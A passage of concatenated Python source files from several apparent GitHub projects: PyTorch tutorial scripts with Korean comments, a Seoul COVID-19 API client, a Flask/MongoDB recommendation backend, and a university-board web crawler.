pipeout = os.fdopen(pipeout)
pipeContent = pipeout.read()
print("Pipe: {}".format(pipeContent))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/09_event_based_programming/asyncioQueue.py
```python
import asyncio
import random
import time
@asyncio.coroutine
def newsProducer(myQueue):
while True:
yield from myQueue.put(random.randint(1,5))
yield from asyncio.sleep(1)
@asyncio.coroutine
def newsConsumer(myQueue):
while True:
articleId = yield from myQueue.get()
print("News Reader Consumed News Article {}", articleId)
myQueue = asyncio.Queue()
loop = asyncio.get_event_loop()
loop.create_task(newsProducer(myQueue))
loop.create_task(newsConsumer(myQueue))
try:
loop.run_forever()
finally:
loop.close()
``` |
{
"source": "837477/PyTorch_study",
"score": 3
} |
#### File: practice/pytorch_tutorials/tensor_useful_func.py
```python
import torch
class TensorFuncions():
def __init__(self):
"""
Pytorch는 사용성있는 다양한 함수를 제공한다.
"""
self.x = torch.FloatTensor([[[1, 2]],
[[3, 4]]])
def tensor_expand(self):
"""
expand() 함수는 인자로 들어온 크기로 넓혀준다.
즉, 텐서 x는 (2, 1, 2)의 크기의 텐서이다.
이를 expand(*[2, 3, 2])를 실행하게 된다면,
내부 값을 그대로 복사하여 (2, 3, 2)형태로 만들어준다.
cat()으로 똑같이 구현할 수 있다.
"""
result = self.x.expand(*[2, 3, 2])
print(result)
print(result.size())
cat_result = torch.cat([self.x, self.x, self.x], dim=1)
print(cat_result)
print(cat_result.size())
def tensor_randperm(self):
"""
randperm() 함수는 random permitation으로 임의의 어떤 수열, 순열에 대해서 만들어준다.
예를들어, 10이라고 인자를 주게 된다면, 0~9 숫자를 랜덤으로 섞인 텐서를 만들어준다.
심화) index_select()와 같이 사용하게 된다면, suffling이 가능해진다.
즉, 저번에 다루어보았던 indice에 randperm()의 랜덤 순열 텐서를 넣어주고 index_select()함수에 건내주면 셔플링이 이루어진다.
"""
result = torch.randperm(10)
print(result)
print(result.size())
def tensor_argmax(self):
"""
argmax()는 argument_max로, 가장 어떤 값의 최대를 만드는 index를 반환한다.
예를들어, torch.randperm(3**3).reshape(3, 3, -1)의 텐서를 만들었다.
즉, 랜덤 원소가 27개인 (3, 3, -1)의 텐서가 생성된다.
그리고 이를 argmax(dim=-1)을 수행하게 된다면,
-1 dimension이니 제일 마지막 차원 중에서 가장 큰 원소의 index를 반환한다.
"""
temp = torch.randperm(3**3).reshape(3, 3, -1)
print(temp)
print(temp.size())
result = temp.argmax(dim=-1)
print(result)
print(result.size())
def tensor_topk(self):
"""
topk()함수는 argmax()함수와 완전 똑같다.
하지만, 인덱스만 반환하지 않고 index + value의 형태로 반환해준다.
인자로는 k와 dim을 줄 수있다.
예를들어, x는 (3, 3, 3)이고 topk(x, k=1, dim=-1)일 경우,
dim=-1 마지막 차원에서, k=1 top 한 개만 반환해줘.
즉, (3, 3, 1)의 차원으로 반환이 된다.
여기서 마지막 1은 k와 같아야한다. 왜냐하면 k는 인자로 받은 값이기 때문에 항상 1이 아닐 수 있다.
우리는 앞으로, 마지막에 최대 값 1개를 뽑아야 할 상황이 많이 생긴다.
이때, argmax()나 topk() 둘 중 어떠한 것을 사용해도 상관은 없다.
여기서 기억할 점은 topk()는 차원이 살아있다. 만 기억하면 되겠다.
"""
values, indices = torch.topk(self.x, k=1, dim=-1)
print(values)
print(values.size())
print(indices)
print(indices.size())
print(values.squeeze(-1))
print(indices.squeeze(-1))
#########################
# 차원이 살아있다.
_, indices = torch.topk(self.x, k=2, dim=-1)
print(indices.size())
print(self.x.argmax(dim=-1) == indices[:, :, 0])
def tensor_sort(self):
"""
sort()는 말 그대로 정렬이다.
topk()로도 정렬을 구현할 수 있다.
예를들어,
target_dim = -1 이고,
topk(x, k=x.size(target_dim), largest=True) 수행하면
x에서 topk를 뽑을 건데, k가 해당 dimension의 size이다.
그럼. 현재 x는 (3, 3, 3)이고 이거의 -1 dimension은 마지막 차원이고, 이 차원의 사이즈는 3이다.
그러면 즉, 큰 순서대로 뽑아와라 라고 해석할 수 있다.
+@ 현재 Pytorch의 버그일 수 있는데,
CPU에서는 topk()방식이 빠르고,
GPU에서는 sort()방식이 빠르다고 한다..
- pytorch 1.6 버전까지는 확인됨.
"""
# topk() 방식
target_dim = -1
values, indices = torch.topk(self.x,
k=self.x.size(target_dim),
largest=True)
print(values)
print(indices)
# sort()로 topk()구하기
k = 1
values, indices = torch.sort(self.x, dim=-1, descending=True)
values, indices = values[:, :, :k], indices[:, :, :k]
print(values.squeeze(-1))
print(indices.squeeze(-1))
def tensor_masked_fill(self):
"""
masked_fill()함수는 말 그대로 masking이 된 곳에, 채워 넣어라. 라고 볼 수 있다.
예를들어, x = (3, 3)의 텐서가 존재한다.
그리고 (3, 3)텐서(행렬)에서 mask = x > 4를 수행하면,
broadcast가 수행되어서 같은 (3, 3)의 텐서에 위 조건에 맞게 True / False의 값들이 채워넣어진다.
그리고 이를 x.masked_fill(mask, value=-1)을 수행하면,
말 그대로 x텐서에서 mask가 True인 곳에 -1로 채워라 라고 해석할 수 있다.
즉, mask에 대하여 fill한다.
후에 자연어 처리에서 자주 사용하게 된다고 한다.
"""
tensor = torch.FloatTensor([i for i in range(3**2)]).reshape(3, -1)
print(tensor)
print(tensor.size())
mask = tensor > 4
print(mask)
result = tensor.masked_fill(mask, value=-1)
print(result)
def tensor_ones_zeros(self):
"""
ones()나 zeros() 함수는 말 그대로
특정 모양(크기)의 텐서의 값을 다 1 혹은 0으로 채워서 만들어주는 함수이다.
ones를 만들 건데, 이미 만들어진 텐서와 같은 타입과, 디바이스로 맞춰야할 때가 생긴다.
즉, 이미 존재하는 x라는 텐서와 같은 형태, 그리고 GPU는 GPU, CPU는 CPU에(디바이스에 따라 또 타입이 조금 다르다고한다.) 따라서 같은 형태로 만들어주어야 한다.
즉, 연산을 하기 위해서는 타입과 디바이스가 같아야 한다.
그래서 이미 존재하는 x에 맞는 연산을 해야하는 상황이 생길 경우에는 _like를 사용하면된다.
ones_like(x)
이렇게 되면, type과 디바이스도 같게 만들어진다.
+@ x텐서는 지금 GPU에 생성이 되어있는데, 새롭게 만든 ones텐서가 CPU에 생성이 되어있고 이 둘을 연산을 진행하게 된다면 오류가 발생한다고 한다.
"""
print(torch.ones(2, 3))
print(torch.zeros(2, 3))
print(torch.ones_like(self.x))
print(torch.zeros_like(self.x))
if __name__ == "__main__":
test = TensorFuncions()
test.tensor_ones_zeros()
```
#### File: wikidocs/2_linear_regression/custom_dataset.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset # 텐서데이터셋
from torch.utils.data import DataLoader # 데이터로더
'''
파이토치는 데이터셋을 조금 더 쉽게 다룰 수 있도록 torch.utils.data.Dataset과 torch.utils.data.DataLoader를 제공한다.
이를 사용하면 미니 배치 학습, 데이터 셔플, 병렬 처리까지 간단하게 수행할 수 있다.
그런데 torch.utils.data.Dataset을 상속받아 직접 커스텀 데이터셋을 만드는 경우도 있다.
torch.utils.data.Dataset은 파이토치에서 데이터 셋을 제공하는 추상 클래스이다.
'''
torch.manual_seed(1)
class CustomDataset(torch.utils.data.Dataset):
def __init__(self):
# 데이터 셋의 전처리를 해주는 부분
self.x_data = torch.FloatTensor([[73, 80, 75],
[93, 88, 93],
[89, 91, 90],
[96, 98, 100],
[73, 66, 70]])
self.y_data = torch.FloatTensor([[152], [185], [180], [196], [142]])
def __len__(self):
# 데이터 셋의 길이. 즉, 총 샘플의 수를 적어주는 부분
return len(self.x_data)
def __getitem__(self, idx):
# 데이터셋에서 특정 1개의 샘플을 가져오는 함수
x = torch.FloatTensor(self.x_data[idx])
y = torch.FloatTensor(self.y_data[idx])
return x, y
dataset = CustomDataset()
dataloader = DataLoader(dataset, batch_size=2, shuffle=True)
model = nn.Linear(3, 1)
optimizer = torch.optim.SGD(model.parameters(), lr=1e-5)
epochs = 20
for epoch in range(epochs):
for batch_idx, samples in enumerate(dataloader):
x_train, y_train = samples
prediction = model(x_train)
cost = F.mse_loss(prediction, y_train)
optimizer.zero_grad()
cost.backward()
optimizer.step()
print("Epoch {:4d}/{} Batch {}/{} Cost: {:.6f}".format(epoch, epochs, batch_idx + 1, len(dataloader), cost.item()))
```
#### File: wikidocs/3_logistic_Regression/logistic_regression.py
```python
import numpy as np
import matplotlib.pyplot as plt
def sigmoid(x):
return (1/(1+np.exp(-x))
# W가 1이고, b가 0인 그래프
x = np.arange(-5.0, 5.0, 0.1)
y = sigmoid(x)
plt.plot(x, y, 'g')
plt.plot([0,0],[1.0,0.0], ':') # 가운데 점선 추가
plt.title('Sigmoid Function')
plt.show()
'''
위의 그래프를 통해시그모이드 함수는 출력값을 0과 1사이의 값으로 조정하여 반환함을 알 수 있다.
'''
# W값의 변화에 따른 경사도의 변화
x = np.arange(-5.0, 5.0, 0.1)
y1 = sigmoid(0.5*x)
y2 = sigmoid(x)
y3 = sigmoid(2*x)
plt.plot(x, y1, 'r', linestyle='--') # W의 값이 0.5일때
plt.plot(x, y2, 'g') # W의 값이 1일때
plt.plot(x, y3, 'b', linestyle='--') # W의 값이 2일때
plt.plot([0,0],[1.0,0.0], ':') # 가운데 점선 추가
plt.title('Sigmoid Function')
plt.show()
'''
자세히 보면 W 의 값에 따라 그래프의 경사도가 변하는 것을 볼 수 있다.
앞서 선형 회귀에서 가중치 W는 직선의 기울기를 의미했지만, 여기서는 그래프의 경사도를 결정한다.
W의 값이 커지면 경사가 커지고 W의 값이 작아지면 경사가 작아진다.
'''
# b값의 변화에 따른 좌, 우 이동
x = np.arange(-5.0, 5.0, 0.1)
y1 = sigmoid(x+0.5)
y2 = sigmoid(x+1)
y3 = sigmoid(x+1.5)
plt.plot(x, y1, 'r', linestyle='--') # x + 0.5
plt.plot(x, y2, 'g') # x + 1
plt.plot(x, y3, 'b', linestyle='--') # x + 1.5
plt.plot([0,0],[1.0,0.0], ':') # 가운데 점선 추가
plt.title('Sigmoid Function')
plt.show()
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
# x_train과 y_train을 텐서로 선언
x_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]]
y_data = [[0], [0], [0], [1], [1], [1]]
x_train = torch.FloatTensor(x_data)
y_train = torch.FloatTensor(y_data)
# 모델 초기화
W = torch.zeros((2, 1), requires_grad=True)
b = torch.zeros(1, requires_grad=True)
# optimizer 설정
optimizer = optim.SGD([W, b], lr=1)
epochs = 1000
for epoch in range(epochs + 1):
# Cost 계산
hypothesis = torch.sigmoid(x_train.matmul(W) + b)
cost = -(y_train * torch.log(hypothesis) +
(1 - y_train) * torch.log(1 - hypothesis)).mean()
# cost로 H(x) 개선
optimizer.zero_grad()
cost.backward()
optimizer.step()
# 100번마다 로그 출력
if epoch % 100 == 0:
print('Epoch {:4d}/{} Cost: {:.6f}'.format(epoch, epochs, cost.item()))
``` |
{
"source": "837477/RTCS",
"score": 2
} |
#### File: app/controller/local_status.py
```python
import requests
import datetime
from dependencies import Config
from model.mongodb.local_status import LocalStatus
def get_api_data(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/TbCorona19CountStatusJCG/1/1/".format(auth_key)
return requests.get(url).json()
def get_all_local_status(db):
today = datetime.date.today().strftime('%Y.%m.%d.00')
result = LocalStatus(db).get_local_status(today)
if not result:
api_data = get_api_data(Config.API_SECRET_KEY)
result = api_data['TbCorona19CountStatusJCG']['row'][0]
LocalStatus(db).upsert_local_status(result)
return result
```
#### File: app/controller/patient.py
```python
import requests
import datetime
from dependencies import Config
from model.mongodb.patients import Patients
def get_api_data_infected_persons(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/Corona19Status/1/30/".format(auth_key)
return requests.get(url).json()
def get_api_data_patients(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/TbCorona19CountStatus/1/1/".format(auth_key)
return requests.get(url).json()
def get_infected_persons():
api_data = get_api_data_infected_persons(Config.API_SECRET_KEY)
result = api_data['Corona19Status']['row']
return result
def get_patients(db):
today = datetime.date.today().strftime('%Y.%m.%d.00')
result = Patients(db).get_patient(today)
if not result:
try:
api_data = get_api_data_patients(Config.API_SECRET_KEY)
result = api_data['TbCorona19CountStatus']['row'][0]
Patients(db).upsert_patient(result)
except:
result = Patients(db).get_patient_recent()
return result
``` |
{
"source": "837477/SIGNUS",
"score": 2
} |
#### File: api/signus_v1/post.py
```python
from flask import g
from app.api.signus_v1 import signus_v1 as api
from app.api.decorators import timer, login_required, login_optional
from app.controllers.post import (post_like,
post_unlike,
post_view)
@api.route("/post/like/<string:post_oid>", methods=["PATCH"])
@timer
@login_required
def signus_v1_post_like(post_oid):
''' 게시글 좋아요 '''
return {
"msg": "success",
"result": post_like(g.mongo_cur,
post_oid,
g.user)
}
@api.route("/post/unlike/<string:post_oid>", methods=["PATCH"])
@timer
@login_required
def signus_v1_post_unlike(post_oid):
''' 게시글 좋아요 취소 '''
return {
"msg": "success",
"result": post_unlike(g.mongo_cur,
post_oid,
g.user)
}
@api.route("/post/view/<string:post_oid>", methods=["PATCH"])
@timer
@login_optional
def signus_v1_post_view(post_oid):
''' 게시글 조회수 '''
if 'user' in g:
result = post_view(g.mongo_cur, post_oid, g.user)
else:
result = post_view(g.mongo_cur, post_oid)
return {
"msg": "success",
"result": result
}
```
#### File: models/mongodb/user.py
```python
from flask import current_app
from bson.objectid import ObjectId
class User:
"""SIGNUS DB user Model"""
def __init__(self, client):
self.col = client[current_app.config['MONGODB_DB_NAME']]['user']
def insert_one(self, user_obj):
''' 유저 추가 '''
self.col.insert_one(user_obj)
return True
def find_one(self, user_id, projection=None):
''' 특정 유저 반환 '''
return self.col.find_one(
{"user_id": user_id},
projection
)
def find_many(self, projection=None):
''' 모든 유저 반환 '''
return list(self.col.find(
{},
projection
))
def find_gt_updated_at(self, updated_time, projection=None):
''' updated_time(관심도 측정 시간)보다
이후인 유저 반환 '''
return list(self.col.find(
{"updated_at": {"$gt": updated_time}},
projection
))
def check_fav(self, user_id, post_oid):
''' 좋아요 이력 체크 '''
return self.col.find_one(
{"user_id": user_id},
{
"fav_list":
{
"$elemMatch":
{
'_id': post_oid
}
}
}
)
def update_one(self, user_id, update_object):
''' 특정 사용자의 정보를 update '''
self.col.update_one(
{"user_id": user_id},
{"$set": update_object}
)
return True
def update_list_column_push(self, user_id, _type, _object):
''' 특정 리스트(fav/view_list) 컬럼에 정보를 push '''
self.col.update_one(
{"user_id": user_id},
{
"$push":
{
_type: {"$each": [_object], "$position": 0}
}
}
)
return True
def update_list_column_pull(self, user_id, _type, oid):
''' 특정 리스트(fav/view_list) 컬럼에 정보를 push '''
self.col.update_one(
{"user_id": user_id},
{
"$pull":
{
_type: {"_id": str(oid)}
}
}
)
return True
def update_list_pull(self, user_id, _type, push_object):
''' 특정 리스트 컬럼에 정보를 pull '''
self.col.update_one(
{"user_id": user_id},
{
"$pull":
{
_type: {"_id": [push_object], "$position": 0}
}
}
)
return True
def delete_one(self, user_id):
''' 특정 유저 삭제 '''
self.col.delete_one({'user_id': user_id})
return True
```
#### File: background/src/interest.py
```python
from tqdm import tqdm
from datetime import datetime
def interest(db, config):
renewal_time = db['master_config'].find_one({"key": "updated_at"})['value']
target_users = list(db['user'].find({'updated_at':{'$gt': renewal_time}}))
categories = list(db['category'].find())
now_date = datetime.now()
for user in tqdm(target_users):
if not user['fav_list'] and not user['view_list']:
continue
# 예외
if user['user_id'] in ["test1", "test2", "test3"]:
continue
# 최근 400개 까지만 보존. (400개 이후는 관심도에 영향을 미치지 않다고 판단.)
user['fav_list'] = user['fav_list'][:400]
user['view_list'] = user['view_list'][:400]
user['search_list'] = user['search_list'][:400]
# user['newsfeed_list'] = user['newsfeed_list'][:400]
fav_token = []
view_token = []
search_keywords = []
for fav in user['fav_list']:
fav_token += fav['token']
for view in user['view_list']:
view_token += view['token']
for search in user['search_list']:
search_keywords += search['keyword_tokens']
# 취합
assemble_doc = fav_token * config.INDICATORS["FAV_WEIGHT"] +\
view_token * config.INDICATORS["VIEW_WEIGHT"] +\
search_keywords * config.INDICATORS["SEARCH_WEIGHT"]
# 토픽 벡터 구하기
topic_vector = config.FT.doc2vec(assemble_doc).tolist()
# 사용자 Cold Point 갱신
cold_point = len(user['fav_list']) +\
len(user['view_list']) +\
len(user['search_list'])
# 사용자 갱신
db['user'].update_one(
{'user_id': user['user_id']},
{
'$set':
{
'fav_list': user['fav_list'],
'view_list': user['view_list'],
'search_list': user['search_list'],
'topic_vector': topic_vector,
'cold_point': cold_point,
'updated_at': now_date
}
}
)
db['master_config'].update_one({"key": "updated_at"}, {"$set": {"value": now_date}})
return len(target_users)
# 예외 함수
def interest_temp(db, config):
renewal_time = db['master_config'].find_one({"key": "updated_at"})['value']
target_users = list(db['user'].find({'updated_at':{'$gt': renewal_time}}))
categories = list(db['category'].find())
now_date = datetime.now()
for user in tqdm(target_users):
if not user['fav_list'] and not user['view_list']:
continue
# 최근 400개 까지만 보존. (400개 이후는 관심도에 영향을 미치지 않다고 판단.)
user['fav_list'] = user['fav_list'][:400]
user['view_list'] = user['view_list'][:400]
user['search_list'] = user['search_list'][:400]
# user['newsfeed_list'] = user['newsfeed_list'][:400]
fav_token = []
view_token = []
search_keywords = []
for fav in user['fav_list']:
fav_token += fav['token']
for view in user['view_list']:
view_token += view['token']
for search in user['search_list']:
search_keywords += search['keyword_tokens']
# 취합
assemble_doc = fav_token * config.INDICATORS["FAV_WEIGHT"] +\
view_token * config.INDICATORS["VIEW_WEIGHT"] +\
search_keywords * config.INDICATORS["SEARCH_WEIGHT"]
# 토픽 벡터 구하기
topic_vector = config.FT.doc2vec(assemble_doc).tolist()
# 사용자 Cold Point 갱신
cold_point = len(user['fav_list']) +\
len(user['view_list']) +\
len(user['search_list'])
# 사용자 갱신
db['user'].update_one(
{'user_id': user['user_id']},
{
'$set':
{
'fav_list': user['fav_list'],
'view_list': user['view_list'],
'search_list': user['search_list'],
'topic_vector': topic_vector,
'cold_point': cold_point,
'updated_at': now_date
}
}
)
db['master_config'].update_one({"key": "updated_at"}, {"$set": {"value": now_date}})
return len(target_users)
```
#### File: modules/crawler/crawling_select.py
```python
from bs4 import BeautifulSoup
from modules.crawler.etc.url_parser import URLparser
from modules.crawler.etc.url_parser import URLparser_EUCKR
from modules.crawler.etc.url_parser import URLparser_UTF8
from modules.crawler.dbs.mongo.db_manager import db_manager
from modules.crawler.dbs.mongo.db_manager import get_lastly_post
from modules.crawler.dbs.mongo.db_manager import push_lastly_post
from modules.crawler.dbs.mongo.db_health import is_crawling
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.error_handler import error_handler
from modules.crawler.etc.error_handler import continue_handler
import time
from modules.crawler.sj_crawling import sj1, sj2, sj3, sj4, sj5, sj6, sj7, sj8, sj9,\
sj10, sj11, sj12, sj13, sj14, sj15, sj16, sj17, sj18,\
sj19, sj20, sj21, sj23, sj24, sig25, sig26, sig27, sig28,\
sj29, sj30, sj31, sj32, sj33, sj34, sig35, sig36, sig37,\
sj38, sig39, sj40, sj41, sj42, sig43, sj44,\
sig45, sig46, sig47, sig48, sig50, sig51, sig52, sig53, sig54,\
sig55, sig56, sig57
def Crawling(URL, db):
driver = None
info_name = URL['info'].split('_')
crawling_name = info_name[0] #게시판 크롤링 선택
page = 1
main_url = URL['url'] #게시판 url 추출 : 페이지 바꾸는 데에 사용
page_url = eval(crawling_name + '.Change_page(main_url, page)') #현재 페이지 포스트 url 반환
end_date = date_cut(URL['info']) # end_date 추출
if crawling_name in ["sj4","sj19","sj20","sj30","sj34","sig56"]: # 제외 게시판
return
#현재 크롤링하는 게시판 info 출력
print("Target : ", URL['info'])
continue_handler(URL['info'], URL, page_url)
#크롤링 유무판단
if is_crawling(db, URL['info']) == False:
return
while True:
if crawling_name in ["sj10", "sj11","sj13"]: #추후에 보수 후에 사전으로 각 함수 실행하기
eval(crawling_name + '.init(URL, end_date, db)')
break
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj44", "sig50", "sig51","sig55","sig56","sig57"]:
lastly_post = get_lastly_post(URL, db)
print("lastly_post : ",lastly_post)
try:
print("\npage_url :::: ", page_url) #현재 url 출력
print("Page : ", page) #현재 페이지 출력
#driver_page 생성---------------------------
# if crawling_name in ['sj10']:
# driver_page = URLparser_EUCKR(page_url)
if crawling_name in ['sj12']:
driver_page = URLparser_UTF8(page_url)
else:
driver_page = URLparser(page_url)
#-------------------------------------------
#Selenium을 쓰는 경우----------------------------------------------------------------------------------------------
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj29", "sj38", "sj44", "sig50", "sig51", "sig52","sig55","sig56","sig57"]:
data = eval(crawling_name + '.Parsing_list_url(URL, page_url, driver)')
driver = data[0]
post_urls = data[1]
# elif crawling_name in ["sj30"]:#---------------------------세종대역 예외처리
# data = eval(crawling_name + '.Parsing_list_url(URL, page_url, lastly_post, db, driver)')
# driver = data[0]
# post_urls = data[1]
#Requests를 쓰는 경우----------------------------------------------------------------------------------------------
else:
#로그인을 하는 경우-------------------------------------------------------------------------------
if URL['login'] == 1:
post_urls = eval(crawling_name + '.Parsing_list_url(URL, page_url)')
#로그인을 하지않는 경우---------------------------------------------------------------------------
else:
if driver_page is None: #Connect Failed 이면 break
error_handler("driver_none", URL, page_url, db)
break
else:
#parsing 형태--------------------------------------------------
# if crawling_name in ['sj10']:
# bs_page = BeautifulSoup(driver_page, 'lxml')
# else:
bs_page = BeautifulSoup(driver_page, 'html.parser')
#--------------------------------------------------------------
#20대연구소 예외
if crawling_name == "sig47":
pageidx = page_url.split('=')[1]
post_urls = eval(crawling_name + '.Parsing_list_url(URL, bs_page, pageidx)')
#네이버 뉴스기사
elif crawling_name == "sig54":
post_urls = eval(crawling_name + '.Parsing_list_url(URL, page_url)')
else:
post_urls = eval(crawling_name + '.Parsing_list_url(URL, bs_page)')
#-----------------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------
#get_post_data 형식 : [게시글정보dictionary, title, date]-------------------------------------------------------------------------------------------------------
#date 규격은 "0000-00-00 00:00:00"
post_data_prepare = []
for post_url in post_urls:
#Selenium인 경우--------------------------------------------------------------------------------------------------------------------
#------------------게시판 규격인 경우
if crawling_name in ['sj29', 'sig52']:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL)')
except:
continue
#----------------게시판 규격이 아닌 경우
elif crawling_name in ['sj23', 'sig26', 'sig27', 'sig28', 'sj44', 'sig50', 'sig51',"sig55","sig56","sig57"]:
try:
data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
except:
try:
data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
except Exception as e:
print(e)
except:
continue
# data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
post_data_prepare = data[0]
lastly_post = data[1]
if lastly_post is None:
pass
else:
push_lastly_post(URL, lastly_post, db)
#Requests인 경우--------------------------------------------------------------------------------------------------------------------
else:
#driver_post 생성--------------------------------
if crawling_name in ["sj21", "sj4", "sj5", "sj8", "sj16"]: #---driver_post가 필요없는 경우
pass
elif crawling_name in ['sj33']:
driver_post = URLparser_EUCKR(post_url)
elif crawling_name in ['sj12']:
driver_post = URLparser_UTF8(post_url)
else:
driver_post = URLparser(post_url)
#------------------------------------------------
#-----------------------------------------------------------------------------------------------위키백과 구조
if crawling_name in ['sj21']:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
continue
#-----------------------------------------------------------------------------------------------게시판 규격이 아닌 구조
elif crawling_name in ["sj4", "sj5", "sj8", "sj16"]:
try:
post_data_prepare = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
try:
post_data_prepare = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
continue
break
#-----------------------------------------------------------------------------------------------게시판 규격인 구조
else:
if driver_post is None: #Connect Failed 이면 continue
error_handler("driver_none", URL, page_url, db)
break
else:
#parsing 형태-------------------------------------------
# if crawling_name in ['sj10']:
# bs_post = BeautifulSoup(driver_post, 'lxml')
# elif crawling_name in ['sj12']:
if crawling_name in ['sj12']:
bs_post = driver_post
else:
bs_post = BeautifulSoup(driver_post, 'html.parser')
#-------------------------------------------------------
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(bs_post, post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(bs_post, post_url, URL)')
except:
continue
#-----------------------------------------------------------------------------------------------------------------------------------
#post_data_prepare이 이미 완성된 경우-----------------------------------------------------------------------
if crawling_name in ["sj4", "sj5", "sj8", "sj16", "sj23", "sig26", "sig27", "sig28", "sj44", "sig50", "sig51","sig55","sig56","sig57"]:
pass
#post_data_prepare이 완성되지 않은 경우---------------------------------------------------------------------
# 네이버 뉴스 기사
elif crawling_name == "sig54":
if get_post_data == None: #잘못된 포스트 데이터인 경우
continue
for item in get_post_data:
date = item["date"]
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(item)
else:
if get_post_data == None: #잘못된 포스트 데이터인 경우
continue
title = get_post_data[1]
date = get_post_data[2]
print(date, "::::", title) #현재 크롤링한 포스트의 date, title 출력
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(get_post_data[0])
#----------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
add_cnt = db_manager(URL, post_data_prepare, db)
print("add_OK : ", add_cnt) #DB에 저장된 게시글 수 출력
#dirver 종료 [Selenium 을 사용했을 시]
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj29", "sj38", "sj44", "sig50", "sig51", "sig52","sig55","sig56","sig57"]:
driver.quit()
#DB에 추가된 게시글이 0 이면 break, 아니면 다음페이지
if add_cnt == 0:
break
else:
page += 1
page_url = eval(crawling_name + '.Change_page(main_url, page)')
# Error handler : 만약 크롤링이 실패했을 경우, 에러를 logging 하고 크롤링을 중단한다.
except Exception as e:
error_handler(e, URL, page_url, db)
break
```
#### File: dbs/mongo/db_crawler.py
```python
from modules.crawler.list.url_list import List
from pymongo import MongoClient
from datetime import datetime
from bson.objectid import ObjectId
def init_crawler_collection(db):
#존재유무 파악
collist = db.list_collection_names()
if 'crawler_manager' in collist:
print(":::: crawler_manager ALREADY EXISTS! ::::")
return
else:
db["crawler_manager"]
info_list = [] # all
info_hidden_list = [] # everytime etc..
for component in List:
info_list.append(component['info'])
info_list.remove('sj34_everytime_all')
info_hidden_list.append('sj34_everytime_all')
info_hidden_list.append('sig57_campuspick_study')
query = {
"is_crawling": False,
"started_at": datetime.now(),
"ended_at": datetime.now()
}
db.crawler_manager.insert_one(query)
for hour in range(24):
if hour == 0:
post_info_list = info_list + info_hidden_list
else:
post_info_list = info_list
query = {
"hour": hour,
"post_info": post_info_list
}
db.crawler_manager.insert_one(query)
print(":::: crawler_manager CREATE Complete! ::::")
def get_crawler_manager(db):
data = db.crawler_manager.find_one({"is_crawling": {"$exists": True}})
return data
def get_crawler_timeinfo(db):
now_hour = datetime.strftime(datetime.now(), "%H")
data = db.crawler_manager.find_one({"hour": int(now_hour)})
return data['post_info']
def update_crawler_manager(db, data):
db.crawler_manager.update_one({"_id": ObjectId(data["_id"])}, {"$set": data})
def Can_crawling(db):
data = get_crawler_manager(db)
if data['is_crawling']:
return False
return True
```
#### File: dbs/mongo/info_id.py
```python
from pymongo import MongoClient
from modules.crawler.list.url_list import List
def post_info(db):
#soojle 라는 데이터베이스에 접근
#존재유무 파악
collist = db.list_collection_names()
if 'post_info' in collist:
print(":::: post_info ALREADY EXISTS! ::::")
return
#info_id : db게시판 테이블에서 보여지는 식별자값
collection = db["post_info"]
#info_id : sj_domain, title_tag : 도메인, login : 0 추가 ==> example
collection.insert_one({"info_id": "sj_domain", "title_tag": "도메인/", "info_num": 0})
print(":::: post_info CREATE Complete! ::::")
#url_list 에서 각 게시판의 info, title_tag, login 값을 post_info 테이블에 넣어준다.
#login은 로그인 유무
cnt = 1
for URL in List:
query = {
"info_id": URL['info'],
"info_num": cnt,
"url": URL['url'],
"info": URL['info'],
"title_tag": URL['title_tag'],
"login": URL['login'],
"crawling": True,
"stay_guideline": 0,
"stay_cnt": 0
}
if "post_url" in URL:
query["post_url"] = URL['post_url']
collection.insert_one(query)
cnt+=1
print(":::: post_info INSERT Complete! ::::")
#최신 게시물 저장하는 recent_post 테이블 생성
collection = db["recent_post"]
if collection.find().count() == 0:
for URL in List:
collection.insert_one({"info_id": URL['info'], "title": 0})
print(":::: recent_post CREATE Complete! ::::")
```
#### File: crawler/etc/driver_agent.py
```python
from selenium import webdriver
from platform import platform
import os
# def chromedriver():
# options = webdriver.ChromeOptions()
# options.add_argument('headless')
# options.add_argument('window-size=1920x1080')
# options.add_argument("disable-gpu")
# options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
# options.add_argument("lang=ko_KR")
# path = os.getenv("SIGNUS_CHROMEDRIVER_PATH")
# if platform().startswith("Windows"):
# driver = webdriver.Chrome('../chromedriver.exe', options=options)
# else:
# driver = webdriver.Chrome(path, options=options)
# return driver
def chromedriver():
path = os.getenv("SIGNUS_CHROMEDRIVER_PATH")
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-gpu')
